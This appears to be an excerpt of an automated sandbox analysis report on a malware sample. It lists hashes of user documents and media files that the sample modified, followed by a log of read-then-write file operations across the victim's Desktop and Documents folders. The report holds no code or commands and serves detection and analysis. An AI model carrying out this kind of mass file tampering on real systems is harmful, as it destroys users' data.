SHA256: af22fb32dd5cd4409c1f176d097ad7fe662e64261e8aaf6d2f0a06bd21ad22c5
SSDeep: 3072:07SpgOL+ZJXVRxxS6118nXd0V1Bm67Z3XbA7:0upgOkJTxxZ8XdMXm43Xs7
False
Modified Files
»
Filename File Size Hash Values YARA Match Actions
C:\Users\FD1HVy\Desktop\-t3hSggSt8.csv 68.95 KB MD5: ad6c1f2a6cdd381ef1a13d3af369d118
SHA1: 33eb70333eedac9888111b1bd449171c56fcc2c4
SHA256: b01e060a3d7781da924fb6e4fd4eab6a5b09345e7be82a8958bc8f770e7a3294
SSDeep: 1536:qj3IKacgmlAQLDH6OeTeKGV6JOsiF5b+27IyxBTqXTH5t63Ye:q0vHQLebT506J385bBLaXTZt6oe
False
C:\Users\FD1HVy\Desktop\-wiWbBcmoqutvw1S.odt 26.84 KB MD5: b78a35a6bd521d114a8a6e2380cd9c6b
SHA1: ec757667040dffd51a1469874a23627bf60c60c4
SHA256: 963368c18a93bd27937a1bc74ff6f071a372cd732651a8ce9ffc50964da37993
SSDeep: 768:I75uZUfiRELgRi3kv14eLTsj7E05fzSZu5:I7kKqyLgRoKSg0sI
False
C:\Users\FD1HVy\Desktop\NwrDTZ.docx 9.89 KB MD5: 0b7811a107f951b464151c5d1a44584c
SHA1: d3a413a3eacb7a8f8ae3aba7511e4b31e8fc6901
SHA256: 18d8a6599ea1fe6d4c4eba5a6f990ad971d780a371d5db13d4e191549307b997
SSDeep: 192:KsoyJ/lZGucLKNCWQ/LGj2dhXnyCDlndl2OVJHuIx79OyL6MoUE49Z:KfmZqLKNnQ/c2DyCxn/56Ix5B6/UjZ
False
C:\Users\FD1HVy\Desktop\kUVq_ b-BGEv YRT\fhdgh_AfpkHHBB9_QqtI\Yzb93Q82DMI82wO\4Mx7zT82zOjgkV9spUg.png 26.38 KB MD5: 57c90fd4575a333df65481cb5fbde5ea
SHA1: 83d4afc2810d7914b222da748d624aa12501472d
SHA256: bd8eea59a031641a32cdcba0997a1098df6d3d1e9a1db8ba46d5cd053ecacaa9
SSDeep: 768:lguEWlTIdsLBts4i336GMS9Zj9PTRBd6bcpOz:oWRbBq4i3kS9l9rYOC
False
C:\Users\FD1HVy\Desktop\kUVq_ b-BGEv YRT\fhdgh_AfpkHHBB9_QqtI\Yzb93Q82DMI82wO\teY6IrO7ujB.jpg 43.30 KB MD5: 2ba3444b16eb9089d30cea6c9a027c5b
SHA1: e8bebf538637c0c603bab60df123c5c230ba2170
SHA256: c61394c3380630708d5444c153777cf6a172c6d96c879ac2074b48c9bfe1ee98
SSDeep: 768:TCfGdOdx4IWvqBLB0vX/6rjiM9pzIFwlpb65R+PmjMh9VCuGuBrxLx0:e8bvqlWXWjb9OFwlpb65RWPzXBt10
False
C:\Users\FD1HVy\Documents\1v32WDK.pptx 21.83 KB MD5: 366ef990393cfd047c49a40abf6796f1
SHA1: d6755cfabbe4d6c235e6fe01e9dfe434ca31b23f
SHA256: 1cf1863f1f108e20967657f0d62408bb8d39af087a3ec80dfef25a864b6c2669
SSDeep: 384:WOHIpAh+ICHTiaLxR2bfVUN5Btwgkj44bVCMBtelMg+UD4/mF9+Gm9a1dLSz0J:WOHIShRiLmbfVUHBWjfPeny+3m9aXT
False
C:\Users\FD1HVy\Documents\4z4 82v.xlsx 85.00 KB MD5: d5e0238a22f7bc784abfce03c9f95cd8
SHA1: 27686f68136c4715bbbfa9e4f9ab0e7a3fca2278
SHA256: 3ecba9d88d232d0585b2add438bc5e51880f8a112bbfb96f9ce5f7fc3da1e412
SSDeep: 1536:GObYmhDd8qOQvjon4omiI5YRE+xuEpVxbxdU+WMw7WiyB9hxbVIHkw7RVN1MB+:ZDhd8QFomkRE8umVx2/9W3B9hXINDMB+
False
C:\Users\FD1HVy\Documents\9dHCFyZ_.odt 87.84 KB MD5: 2ceb8c12ade85aa392ced42ceeab6b06
SHA1: 5f0e03816044369d1ff5e0d50af5c4d3dafb9b31
SHA256: aa2835f26ddccbfcf46a036c0e166d74c4f896adfca7e5ce73e42b082a7e0c77
SSDeep: 1536:IiJ1lJ6BXof7gm+rI0+fhxwyfBON6wueixk/6qDQOr1aJ2ihJEPW0xDjmXoakAIo:aVSMm+EHhxfBO0i+/koJ2e05mYZDc
False
C:\Users\FD1HVy\Documents\BZh3 QA3w.xlsx 59.31 KB MD5: 304fbb23542e95c7e1ddf7f96fa92f18
SHA1: a8017643f3db2db54f5333cc9d6f3f73c3335286
SHA256: 81eb3ba9c4d9c2ea6768fc978a8f52c7085439d3b4ef1f5c44397da4cf7a1c61
SSDeep: 1536:q7H0iibmbRO1e93YrDkkTdxMSuPX9gV7+DFkjjrOKIbNIFz:q7UiiKFOE9YD3TXcPG7KFkfrIu
False
C:\Users\FD1HVy\Documents\IDj9.docx 69.11 KB MD5: f9f0de41922094a98aa6eb1069bd71f1
SHA1: 312a14d8c0fe53b8e3a50d21bd9be623e8317b6d
SHA256: 1e7b3980e03e94b51f523a1cfbe993c560db00e7fddbe3eaecc946736d9cb5eb
SSDeep: 1536:9jSYA2iTywJIRZTYYlhjt8gB0tmr0fg43NTwWaGBnK:9jSD2zwSrNR8Vk0fnTdaqK
False
C:\Users\FD1HVy\Documents\oK6_.pptx 72.27 KB MD5: c100d596d86f2114cb136b36e8dfe4b7
SHA1: 0b6d33ddca29af40800a5e6d621646c8fd81dd1e
SHA256: eb969b956f0864474d6ccf5e7c588bdc14e3223d759f43fa2855be7da7bc3ca0
SSDeep: 1536:WBr87ww8P6O++j6nuNVlrIuY/fCqrEjTIEYbtWFu:WVuf8PWnEVllYiZjTInRp
False
C:\Users\FD1HVy\Documents\X7xxXdVkKAI.pptx 10.56 KB MD5: 7fa4252827c5ce4266e99697db5e9d27
SHA1: 481a0a4ecf152d1a0cf3c587dfdb65ed00797403
SHA256: 04e016d28a310ed0b51b34c9b2130624d67e636205e96d7e12b96e175f220cd2
SSDeep: 192:WRxd11WHI1MFw6Mcxo99wdSnkvvTbWNzpBQBau7k1K2tH+/k7VRzMxjdEc/j:Wfd1II1ItXo9Wdi+qQV7OH+kRzYx//j
False
C:\Users\FD1HVy\Documents\kqnw_pPQeZHhvh\iPxRamNOgEfL6vt-WkOO\RwxQrbJr.rtf 54.62 KB MD5: bdd278c06d2e1fbcbad8df10434f0450
SHA1: 4c3e06a2ad03f46af3fe420502327715c46c5ff7
SHA256: f73aa083e539ea8d2e0b31e5f8ed8844bdfa3ce116f5ad759261ae24f7dc40dd
SSDeep: 1536:SEkovkSLYdgbXJ37WBOfcmVS8LRA5Jy2asOPTIp7D:rLvkSEgdqEftjkYTsOEpn
False
C:\Users\FD1HVy\Documents\kqnw_pPQeZHhvh\iPxRamNOgEfL6vt-WkOO\77bIp480yHDf0\Hi Fm0SkJi.pdf 33.14 KB MD5: 7b5f427a11038c7a1ccbbf4436fb6148
SHA1: 146342583d1b834c83f5b569c10661ebfcc925c2
SHA256: 4bb3a93a52aa7bdd457c15450106cdf844f54a4080b2f32e8bd008fa64fec2f2
SSDeep: 768:c7qHOQN0jA2JOQYZM6xgbOj/kvvWHZLLzjY4b/DLpt:t3zGy+0gKkvvWhL
False
C:\Users\FD1HVy\Documents\kqnw_pPQeZHhvh\iPxRamNOgEfL6vt-WkOO\77bIp480yHDf0\pjQnM18Yq7so0m2EOvAa.csv 11.45 KB MD5: 10674ff65d0458ae63ac252946501ec0
SHA1: 4971ae16efc2fc4d0056e70ed7acafe5160c6468
SHA256: c51b202f25adde4e7e8acae0728cb2b7a603645861d2e4a4b6c4b43907f663fd
SSDeep: 192:KGF9HF98MTgUzv6pRO5R/jOtNXJkSIidDINv5pJ0se9at1ObabHVmnmPdvk:KGPHFUev6OTOtNXJHIitIDpOiwYHVmV
False
C:\Users\FD1HVy\Documents\kqnw_pPQeZHhvh\iPxRamNOgEfL6vt-WkOO\HhXhtU9gOiLGZ\6Py75SwYl1UPRzmW_N.csv 17.34 KB MD5: b80a04cef20a574c1f0c92b52bf7a621
SHA1: bc616a3697ae5a954b633720238076a6fcd38ed1
SHA256: 77de2ebe414ed7b281c366209404251a72448871bddbddff89505f3c3835f1db
SSDeep: 384:1D1vIoJN4DdGq1LlZYOKS9UARo+UyTyE7vu4Qb+ko73kzPbc/:1D5PsGxEbU0yQQyobc/
False
C:\Users\FD1HVy\Documents\kqnw_pPQeZHhvh\iPxRamNOgEfL6vt-WkOO\PVOgT\jDPo.xls 30.67 KB MD5: 84637d6d31a2206fbd784535d330764b
SHA1: 847de053198eb5b1fd861567d5499699d8a7ce9b
SHA256: b00a7ce3b99600b6b4f23198d3c7f6faf09b84a9c0c0c9801d9fb38459d19db9
SSDeep: 768:mxY+kU13M5cxdb4itx0EylrYhwnE6txjfIJw:EXkU13M5md0GylUgbOw
False
C:\Users\FD1HVy\Documents\kqnw_pPQeZHhvh\iPxRamNOgEfL6vt-WkOO\PVOgT\oKefxkUyIL.xls 57.12 KB MD5: a8a045af2595eded55949b5a276ca2ca
SHA1: 2e4986af90dbeb18b3bc2ea06bc8095833e81b8f
SHA256: 98484109bda2d2726cbbd4409f157718a5a5a5b87dd6710b6a8bee6a4b64ddd7
SSDeep: 1536:FKwZ/D9d4Z374f057rW39+Tnlj5MMZYra7qV:FK2/fWUFulyMer1V
False
C:\Users\FD1HVy\Desktop\0YuVxzeY9-b4MF.avi 90.09 KB MD5: 300442a9a89a5f8b978098fed807cd5e
SHA1: 2296f3c499647d976c1be2712b816f000958cbad
SHA256: 6d4293cf6ba2cc8a104d855eff28f1d03babe7de6c05f0100529bcf47b5cbe74
SSDeep: 1536:N+Euki973khdes3qfwpVoqy+5psAqCcspvDl14Q8DFB379BMeV274zt:N+E+EaEWql5JNvB2QQFB3hBMKzt
False
C:\Users\FD1HVy\Desktop\dudTlSq3.mp3 16.64 KB MD5: 43b15ad65e87ca0632e61021bb8f68ee
SHA1: 8ab9d5854a5eede6a4f62f04a87d3f58451285ee
SHA256: 2d585eac99897efa1d9a9f764519a9aa2ac2c0c10fb689f78556e7b4b0e3d1b6
SSDeep: 384:SPf3ZHYibDeRZvv0uOX+j2ad44Kx69Fo0eHYPj+YEPmrP/md:SPf1t+5cubR1oCK0D6bP8g
False
C:\Users\FD1HVy\Desktop\du_y8ZA.bmp 96.30 KB MD5: 0f03002dbc4a9bf37d0625fbbe0c85de
SHA1: 10e0bd709431adde0b9fa22b663ae1914b0e4719
SHA256: cac907691955d5339837066f5012ffccfacc74ed3addee6ed4c056cc789c0327
SSDeep: 3072:8fG177ozcQMxSJMXeuVwfA0NNZ6NkpfedV84:b1ozNGOEo5ZHpfo84
False
C:\Users\FD1HVy\Desktop\hIJHv_tpsSRLGQkXt1.mkv 33.86 KB MD5: dc72854cfcfba3763062e99665002cca
SHA1: 3f9e667c9b1e8d6544a8c8a9c2cedd14df327a78
SHA256: 0cf21a70e18f6107e43894b3ec74863afc276ee70b22b26951d3ac94784a2bfc
SSDeep: 768:ZkAgYgDI+6xZQJfW9UOc+So6SCB1+R+B8DmqR0QbU:KAgYgDyqfWTcc6jBsDmqR03
False
C:\Users\FD1HVy\Desktop\kXyvY.bmp 1.19 KB MD5: 6f7ae2f77556f78d581979d239755aeb
SHA1: 2e8fb0f37373c03c0be194f1534e404b403b9459
SHA256: 1c6ef441941b96f802886f0ef1870f95401c400aa47a9205077213cecfff457b
SSDeep: 24:nqp9DKCgq7vr4V/XPPTZt4joYc3Gs5lEfOKGAuU8foFtxJjlI:qp9DKCg6+XPrZeBsM2KcRoznZI
False
C:\Users\FD1HVy\Desktop\ljwNeYj.avi 83.36 KB MD5: 0cc3f7044a0974ae8e55a0a556ab024a
SHA1: cdcd40620345b68644361cc7336615706ca05df5
SHA256: 11d541d432ff0138f9dee36173018affcae89605c97ee2d8361c353c35604a24
SSDeep: 1536:QGsmgim2roTF5kZa060i4nOMyiXH2e8D4CHfsCJwT86/VuvhLx:ZsmZmfTAZ16ZLMjQICJ8kht
False
C:\Users\FD1HVy\Desktop\mJmzsgIR.avi 3.98 KB MD5: 9db6eedcbaae78df2f408c22c6b1efac
SHA1: 761f93169388981a21fdb15f9d80926eb85bf0a9
SHA256: 02ba7929c08ecd5b916342021264d75ab843b4cbd93f5a5907ef201c2b1ecac9
SSDeep: 96:jWOmKed29CoDHdYeRMiXBE2D1T9vCxl5Z8G1lM1H4ttZI:iOmHI9CoDHdYMM8jfC71Tq
False
C:\Users\FD1HVy\Desktop\OZa1OvHSiPZtGYMnr.avi 99.98 KB MD5: 270e3e3895e9225381076e35bf63e3ac
SHA1: 19dd8d92f375167f6aa1450ed0288ba7b10ea204
SHA256: 837b823b656ce295236edfb274fc166d8d9adc8cb3d18d3980787fd51322ca60
SSDeep: 3072:OCqq9c0ms4eW5u3fKQNVJRrZwQe2zSUs6d:pR9c+4Xu3i62p206d
False
C:\Users\FD1HVy\Desktop\RSUbGrWMOv90jjgcKmCA.jpg 57.09 KB MD5: 2f290342d3f473eeb5e6bc114c6858d5
SHA1: 7871e7f09559351a78990ee2a7502898affd9d33
SHA256: 4b190f44d90a8154c38af4a2f5b54b126264cfd094c2a9acd7eb06b180bbf8d7
SSDeep: 1536:3iXsyx8zbaRS0Ba3pfy2wLVnZtHHTNay1d5UMfzfTh4CZeOYWsjID:axIWRlsMBHpFU47ThoObsjE
False
C:\Users\FD1HVy\Desktop\uy _qJUK.mp3 53.23 KB MD5: 6ce21db449e33d185bb5780d72f4e91b
SHA1: 1de59bcec508b398a33a53535eeccc93c9e3f8ae
SHA256: cf4c6842fa3c0b1b33bd55247bf1c47c4b8e816363d3cf42a665659c39c9774d
SSDeep: 768:gdgawE4GSM2+M4ONyfyJYKBZ9u9wGc/j2K2wKFr0OUiVxibjIFWDk+LfZYjiot5v:Laf4Xx1yYYKBZMkCPwKFAjAikuotsW
False
C:\Users\FD1HVy\Desktop\Vmnx49O7kGj.png 60.89 KB MD5: 376641291ef5532bea940b8fbfb5ce45
SHA1: 68ecf05d9cc3e78e839ba85fc4ae39c64fcce1d2
SHA256: 4e01a38c408073353ce8ef7ee521d46630f1b53659c641d7c5ef780df88c09a4
SSDeep: 768:mxfLYbjWF72LQ6z/6v0LQJi2Jq87QUXG1UxLO33yX1crbwSi88kIHFGbF+MkPI/Z:m5ei4/6vOV2E8G+OyXifwL8JozoPaY
False
C:\Users\FD1HVy\Desktop\kUVq_ b-BGEv YRT\fhdgh_AfpkHHBB9_QqtI\K6Z4SfIpaB.mkv 88.98 KB MD5: bc9240710eba1af58a5d8fbd1249d6c2
SHA1: 06f46229ecd3cde887d6d0ab9c2d2f526a1c0994
SHA256: 5a4b6f2d01ec8660f7d3672bc1c83d5d998f29738282500b0e2bf8c1d75c5155
SSDeep: 1536:tG8PHfeAQjL6bERPhynZJN7+lUJ1oMuc9jnVToHnZLIQc4QllMKg:j2D7iElIFFVToHFHc4Qal
False
C:\Users\FD1HVy\Desktop\kUVq_ b-BGEv YRT\fhdgh_AfpkHHBB9_QqtI\TfNW1f m7CX1OiM.xls 23.77 KB MD5: aa6c986a3eaffe463a64b0d155a8bf54
SHA1: 8fbb656cd9064b56b9f54cee7aa9fd8c0b7b1df8
SHA256: e9acdc34703a1af5da3e1433a584b734707559a04cb1fcf19805368a1e61bd88
SSDeep: 384:qHYPu1fDzvfu3vCniktGlqYCnV+GRgqSr9foCQy7Z+kjyk6c0Qhe/Hc:iX1PfuKni0RgdJoI7ZDjy6ZhH
False
C:\Users\FD1HVy\Desktop\kUVq_ b-BGEv YRT\fhdgh_AfpkHHBB9_QqtI\Yzb93Q82DMI82wO\nVeBdFzvpwwtXC.mp3 61.80 KB MD5: 60e0c2d3e9ce3be37d8ca6ad7bd5f982
SHA1: 8b05ff300e33446a9fbda6cf28211ea06e47fbc0
SHA256: 1e1028c91fe8c80941537dcc5b0411a02d1bcc4a008a9bd54814b1217d33c708
SSDeep: 1536:RuQPLIGxDKH6Yz9MTi+bu7cwhh8AK6XVyQ0wte/z:RuQPFQR9MTAgwrK6kbF/z
False
C:\Users\FD1HVy\Documents\--8WWFRhf0b.pptx 82.61 KB MD5: 486ced9e938878bca51b1e2dc2ee8d7c
SHA1: 4f75e4862795b5b3bcf22fb357cff5ba8c52e15a
SHA256: 67baf1c785f8caa1927f07ba9a7af7d587754d01a7cb222b7f8536a729e4b899
SSDeep: 1536:Wpv6ciiVuNMJbJIoZHXSafAUZslo5oTZzvW08H7aQMZYuWmZJeg+HdAyEmp:Wpv6MAN4zHXVdMZz0uQDmZYg+H+yp
False
C:\Users\FD1HVy\Documents\6jL9GY5.xlsx 18.45 KB MD5: f5336f7e6541beb4e482029dbc039a52
SHA1: 4c89a858ed9d4b67087594b3f06f1b602a4497d1
SHA256: 06fc27a6a86c813e348ea53ad2b418f5dcdce09ea511929acd1275d3ab375232
SSDeep: 384:RvwbNXKC4j5ADwiOjYATes/x+6qnhZfx69wiFaj71N0gPKj7s8LzaT:JSXK1akZHT5/kVnnxiw5n1/PUdzaT
False
C:\Users\FD1HVy\Documents\Am2R.docx 5.69 KB MD5: ad83c7ddbf84d4dd29177646127e6637
SHA1: f759c00158fa64897ea08f84e58754b25b411a3d
SHA256: 41a51b0170e52d75b97abb476372c951429fb4dd4e3c2e68657881761d986942
SSDeep: 96:/1FvLRO3ggJ3tqsNod7XiILlr6yL97sSkSl6Roa9yBJUOufMzUVxPF/+QFXpWKLK:/1FvLROwg/Rod7XiKPaSxlvKyvlsr/1W
False
C:\Users\FD1HVy\Documents\ayhyoBKV0xMLiy.docx 88.20 KB MD5: e9337169b25a54ce1c58b630681cbc3b
SHA1: 3875577a5f749cad374272652d1b3d9842445d35
SHA256: 25c0c77fafa9823cd8fe46e5b9b6ef207523dc3b7ec220a312f920fb3403078c
SSDeep: 1536:S8okpScRRPHIJ3dfuyfxm/4urpuWqpmytxkQyqgZ9ZhOH+IPALDB4k09JTgVwZyO:SsScalZm/VZqRyQSfhgvgBVFgZ
False
C:\Users\FD1HVy\Documents\pFdPoLW.docx 48.47 KB MD5: 30910d740468f2cbf1d312ba1ff7032a
SHA1: 47f751dea73b9314de45339b9048e80481838f3b
SHA256: f9c55b2af5f8f0aee1758e8509e083993ccfd5a6b611709ad68f792c303f1e2d
SSDeep: 768:RHjmDKnUOrgyoXvrdJANLUyDDz/uzE1l6jCfqBeCDn2WLK/7Pnwki/hLgcheDOCJ:dSWnUXv/zyDD7bSCfq9n7ObwkOL9O
False
C:\Users\FD1HVy\Documents\uZFTfGR0J-cG.pptx 85.69 KB MD5: 7a04b76148ba0ca4a7e3b016b8edfce7
SHA1: 6455b3f3c688bd7bb185241ac4c005946f833b9a
SHA256: 1c3a8f6b6cdaa00f882ca69ac674cbfbf88bf550524034154988e01a262db467
SSDeep: 1536:WwAMj8Yqn5hQvkJbB4LbH+B26MhY8r7Uk/4vFl9e/lqToS2I/55bN1oRHo+DE:W0j8YqnLMWYbeBrghqToMRPMJY
False
C:\Users\FD1HVy\Documents\v2OWp_Gc8AHT3d4nGyy.docx 3.38 KB MD5: fc717b83436043a47f821d9919ac439d
SHA1: d76e9af83137a789eda026553f0873a5100878dd
SHA256: 4c7228432c013cc3bea3f01e92227d3bda4f7b7e7eb9482eff0f53eb28deeeff
SSDeep: 96:bGpMEY2PMxKBsAtGaI25LvESyOEfzRAmBbukgMCMrlO:bs7PPMxKmJaBLDzELmmB1gilO
False
C:\Users\FD1HVy\Documents\V_Zl34r.xlsx 32.36 KB MD5: e450aabe898c9e7cdcf192d843bdfd01
SHA1: 90d9c472db6ac06e3bfb699caee1df70c44feb7a
SHA256: 19138d0e4afa0d02467dce098a12a76954703316c65da47bd0bc89dfca0fb80e
SSDeep: 768:mpG7X0Nx+jxsLGOOZRVO820AFxz3DgEcn2LPdOS6cqGj:xENxKOLGO0o820Ar3Q2LPHbqGj
False
C:\Users\FD1HVy\Documents\xpmGmPcch3uV.xlsx 52.30 KB MD5: 2db4bc800d041e580307450c01e34261
SHA1: a68e0dc21efdbf73647d6d4c303f3d750344d37c
SHA256: 91a5078d5e767040460382600bddf188e81b85d1e6a32cedf185bd7b3fe2f458
SSDeep: 1536:mzkv4hlTAmUgw5DvIzr4Be2BW/tLBL6aCDN4sXNu5APOwwbr:mzP7lXYDkrWjo/tLJCDtw096r
False
C:\Users\FD1HVy\Documents\kqnw_pPQeZHhvh\iPxRamNOgEfL6vt-WkOO\5hwK.doc 29.95 KB MD5: 5a987f72bbfe5c3a17d8626871485ae9
SHA1: a40ecbd6dbfc699506c41528d883aee5d285b0ee
SHA256: e392fc5def55e12dbcfeee41ef89fa3d04d89038ff49bee421a232f0834d95e2
SSDeep: 384:6PQ0jRYVmVzP8nx5BtIy9YVaLycdMAvBXvbMuyPbun7okHe1EJmxhN2:svRtjeXBSyiV+DvJDuaLHlWhN2
False
C:\Users\FD1HVy\Documents\kqnw_pPQeZHhvh\iPxRamNOgEfL6vt-WkOO\NeCh.csv 52.03 KB MD5: f6f6b4471c5e52dabb7620fbbed0c918
SHA1: ab83fb48454ebc097c612ea1440b0be35d5ad943
SHA256: 8aaa925da5de86d326c413181ab5fc042aaef1ac33c16237fa05a67cb75f6bf1
SSDeep: 768:Ws21iTRFdPIsEDnjy41aeidjvEQbTaExJvAn5+fFnl337hwNUDLxaFl5qKq9Zfc:igPIz1aeAvfFxNbfv3KQtR9Zfc
False
C:\Users\FD1HVy\Documents\kqnw_pPQeZHhvh\iPxRamNOgEfL6vt-WkOO\77bIp480yHDf0\47y8mp0s.csv 56.70 KB MD5: 19092c0a6199adfc03ebe06b39b8d261
SHA1: d669a8d152df12ee228da0c0ea040e8e867da038
SHA256: a3207751b5980a2d6e42b7d6dad785b5d11cdd119cf8663991422ddb06c37117
SSDeep: 1536:uYGrlliN6z6FJs1NpbHt3XtpUrY67TgTCYt0n:rGrls0W8pbN3XtahUmYtm
False
C:\Users\FD1HVy\Documents\kqnw_pPQeZHhvh\iPxRamNOgEfL6vt-WkOO\HhXhtU9gOiLGZ\hy UYGYQM9MBJYSeMTx.ppt 94.34 KB MD5: be6b90ef3f6d22765dd209f3b481c09a
SHA1: 72dd2b567cd96df526554db5bda7efa04abf50a8
SHA256: 1c8acc2281743befc7bf32f7edd18460fb2ff6befb0650274c4b35537a97e139
SSDeep: 1536:ki5MqEsbZNdbZdr7XHbKecolmS0RcflizYrJ/uubIyZ7JYWOJF3S6GSAkANDP:7Gq5ZXZdHLKecIzW0l0YV7aWOHS6G8Ah
False
C:\Users\FD1HVy\Documents\kqnw_pPQeZHhvh\iPxRamNOgEfL6vt-WkOO\HhXhtU9gOiLGZ\pFzSit0y49o.odt 38.69 KB MD5: b198fe00ce4f73292036900d13334381
SHA1: e8f5b8ddf18fc121f67a2641e6fd3e928da8d5f2
SHA256: 82dabd555f0da734113827ee2f180926ebb389689d317b984c8e0f67608f8b3f
SSDeep: 768:IDMInmaon6Udd5cenEA9TcM3tw4viaiY+HsIqm8u+rAJEawgjdrXQ:IDHnmaE7pce3TcM3piaR+HCmv6awgZU
False
C:\Users\FD1HVy\Documents\kqnw_pPQeZHhvh\iPxRamNOgEfL6vt-WkOO\HhXhtU9gOiLGZ\So7sQ6gpKdfTrbp.ppt 22.56 KB MD5: 1ac791d2b4d119deef09d170a48e27d4
SHA1: 162eadbbfc74c8022008074b0f2421d28a3cd80e
SHA256: cdde47d23ea0294c729634d667d46bb692a884593cfae3613932efd13a48a555
SSDeep: 384:d4z/5dxa6zr4UtBEr9wJTntpmyhBE5PiEcacOnC9E5rjt+/:d4z/5dxdptBErEnjmyX2jm6SEjA
False
C:\Users\FD1HVy\Documents\kqnw_pPQeZHhvh\iPxRamNOgEfL6vt-WkOO\PVOgT\43Z39pBBrj.pptx 72.45 KB MD5: b569732fe900f88590e3cef9ca70becd
SHA1: 7210de7df3aa0f35a8fb48f94dcdc7e0863d70b6
SHA256: 305dc4520b397bf53908a29822e6b2e4170c715dc3ca151566d77d73e0a6e82c
SSDeep: 1536:W+iSxOznr5lNxI9XU9M1w2E26Rea6oFbwfL0JEipmfoWvsIrM+KMat7IPLG84:WJ02r5lKXU9FYaJFUfLeEAWkIrMtMaJ3
False
C:\Users\FD1HVy\Documents\kqnw_pPQeZHhvh\iPxRamNOgEfL6vt-WkOO\PVOgT\kryOh-FNUXNCWUA.xls 86.12 KB MD5: ea492cad22e779812b3774fc0650cf9d
SHA1: 4c0f0f99c49fe1788bb4893b707da4df5711e480
SHA256: 6c4660e64ca11bdb91a87baf01af1404a4fbd69dc9b7c834f5e83609dbfd82da
SSDeep: 1536:WOusoGWE8XyAHvebGzeIZMh8o6K2tBioA6Sz9Tn3GHWX+nXYVo7kQ:VloGgJHGb+Dmn+BioA6Sz9Tn3eWunoOR
False
C:\Users\FD1HVy\Documents\kqnw_pPQeZHhvh\iPxRamNOgEfL6vt-WkOO\PVOgT\yOtj RSlDnhyJi.xlsx 80.62 KB MD5: 302c75e59b647def6274b26763079b0a
SHA1: 885bf0f4a424de9e88e79a821d6d67227d7bf54c
SHA256: 1b511995adc16faea282cfa6c50651a95dc857cc129281c0cabc9e334204e35d
SSDeep: 1536:5Hza5JRyP04/DxLl+HrHC1wO5qCRyIDWaaC+eNS2a4skXYSJ6WmiztpEyJJwO:uAxL4HDqwO5qCJNNBah3S4tiz7
False
Host Behavior
File (1138)
»
Operation Filename Additional Information Success Count Logfile
Create C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Desktop\-t3hSggSt8.csv desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Desktop\-t3hSggSt8.csv desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Desktop\-wiWbBcmoqutvw1S.odt desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Desktop\-wiWbBcmoqutvw1S.odt desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Desktop\0YuVxzeY9-b4MF.avi desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Desktop\0YuVxzeY9-b4MF.avi desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Desktop\dudTlSq3.mp3 desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Desktop\dudTlSq3.mp3 desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Desktop\du_y8ZA.bmp desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Desktop\du_y8ZA.bmp desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Desktop\hIJHv_tpsSRLGQkXt1.mkv desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Desktop\hIJHv_tpsSRLGQkXt1.mkv desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Desktop\kXyvY.bmp desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Desktop\kXyvY.bmp desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Desktop\ljwNeYj.avi desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Desktop\ljwNeYj.avi desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Desktop\mJmzsgIR.avi desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Desktop\mJmzsgIR.avi desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Desktop\NwrDTZ.docx desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Desktop\NwrDTZ.docx desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Desktop\OZa1OvHSiPZtGYMnr.avi desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
Fn
